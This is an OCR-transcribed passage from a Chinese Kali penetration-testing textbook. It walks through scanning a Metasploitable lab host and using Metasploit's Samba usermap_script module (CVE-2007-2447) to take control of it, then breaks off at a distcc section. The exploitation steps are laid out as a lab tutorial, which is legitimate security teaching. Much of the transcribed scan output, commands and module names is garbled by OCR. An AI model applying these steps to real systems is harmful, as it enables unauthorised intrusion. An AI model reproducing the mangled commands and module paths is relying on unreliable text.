MSF8

>>>Kali安全渗透测试实践教程

Samba是一个用来让UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做链接的自由软件。在Samba 3.0系列版本上存在一个用户模拟漏洞，攻击者利用此漏洞可模拟任意用户，执行未授权的操作。

利用Samba 3.0漏洞进行渗透的过程如下：首先在终端输入命令nmap-v-A-T4192.168.137.129查看靶机的Samba服务版本,如图5-47所示:

[#](1):* map-v-A-T4192.168.137.129

Host script results:

_clock- skew: mean:5s, deviation:0s, median:5s

instat:NetBIO5 user:<unknown>,NetBIOS user:METASPLOITABLE,NetBIO5 user:<unknown>(unknown)

Names:

METASPLOITABLE<00>

Flags:<unique><active>

METASPLOITABLE<03>

Flags:<unique><active>

METASPLOITABLE<20>

Flags:<unique><active>

\x01\x02 MSBROWSE

\x02<01> Flags:<group><active>

WDRKGROUP<00>

Flags:<group><active>

WORKGROUP<1d>

Flags:<unique><active>

WOPKGROUP<Ies

Flags:<group><active>

sub-os·discovery:

05: Unix( Samba_3.0.20- Debian)

NetBIOS computer name:

workgroup:WORKGROUP\x00

System time:2018-08-30T22:09:38-04:00

smb2-time:Protocol negotiation failed(SMB2)

图5-47 查看靶机的Samba服务版本

在图5-47中可以看到靶机的Samba服务版本是Samba 3.0.20-Debian,符合攻击的版本要求,该版本存在漏洞。打开MSFConsole,使用“search”命令搜索可用于Samba服务的渗透攻击模块，如图5-48所示：

matching Hadules

…

Hase

Disclosure Date

Rank;

Description

auxiliary/ admin/ smb/ sasha_synlink_traversat

normal

Samba Symlink Directory Traversat

auxiliary/ dos/ samba/l sa_addprivs_heap

normal

Samba lisa_io_privilege_set Heap Overflow

auxiLiary/ dos/ samba/l sa_transnames heap

normal

Samba lisa_io_trans_names Heap Overflow

auxiliary/dos/samba/readhttps_ca_list

normal

Samba read_nttrans_ea_list_Integer_Overflow

auxiliary/ scanner/ rsync/ sodules_list

normal

List Rsync Modules

auxiliary/ scanner/ smb/ smb_uninit_cred

normal

Samba_netr_ServerPasswordSet Uninitialized Credential State

explost/freebsd/sanba/trans2open

2003-94-07

great

Samba transzopen overflow(*BSDx86)

exploit/ linux/ samba/ chain_reply

2010-06-16

good

Samba chain_reply Memory Corruption( Linux x86)

exploit/Linux/samba/is known pipename

2017-03-24

excellent

Samba is_known_pipename( ) Arbitrary Module Load.

exploit/ linux/ santa/ lsə_transnames_heap

2007-05-14

good

Samba lisa_io_trans_names Heap Overflow

exploit/ Linux/ samba/ setinfopolicy_heap

2012-04-10

normal

Samba SetInformationPolicyAuditEventsInfo Heap Overflow

exploit/linux/samba/trans2open

2003-04-07

great

Samba transzopen Overflow(Linuxx86)

exploit/eʊltɪ/səmba/https

2003-04-07

average

Samba 2.2.2-2.2.6 https Buffer Overflow

2007-05-14

excellent

Samba

"username map script"command Execution

exploit/ osx/5asha/l sa_transnanes_heap

2007-05-14

average

Samba

lsa_io_trans_names Heap Overflow

explost/osx/sasba/trunsZopen

2003-04-07

great

Samba transzopen Overflow(Mac OSXPPC)

exploit/ solaris/ sanba/ lsa_transnames_heap

2007:05:14

average

Samba lisa to trans_names Heap Overflow

exploit/splaris/samba/trans20pen

2003-04-07

great

Samba trans2open Overflow (Solaris SPARC)

exploit/ unix/ aisc/ distcc_exec

2002-02-01

excellent

DistCC_Daemon Command Execution

exploit/unvx/webapp/citrix access gateway exec

2010-12-21

excellent

Citrix Access Gateway Command Execution

图5-48 搜索可用于Samba的渗透攻击模块

在图5-48中找到模块“ exploit/ multi/ samba/ usermap_script ”,这个模块可利用漏洞CVE-2007-2447执行命令。在Samba版本3.0.20到3.0.25rc3中当使用非默认用户名映射脚本配置选项时，通过指定一个包含shell元字符的用户名，攻击者可以执行任意命令。因为此选项用于在身份验证之前映射用户名，

第5章 漏洞利用 (< (

所以不需要身份验证就可利用此漏洞。在MSF中使用该模块，并设置目标主机RHOST的IP地址为靶机的IP地址，然后执行攻击，如图5-49所示：

图5-49使用 usermap_script 模块进行渗透攻击

攻击的结果如图5-50所示：

图5-50 usermap_script 模块渗透攻击成功

在图5-50中执行 usermap_script 渗透攻击模块后,该模块利用 Samba3.0.20-Debian中的漏洞CVE-2007-2447获取了对靶机的控制权,进而用户可以执行各种操作。

5.3.2TCP1099端口渗透

对TCP1099端口渗透利用的是Distec漏洞(CVEID:CVE-2004-2687)。Distec可用于大量代码在网络服务器上的分布式编译，但是如果配置不严格，

183-

一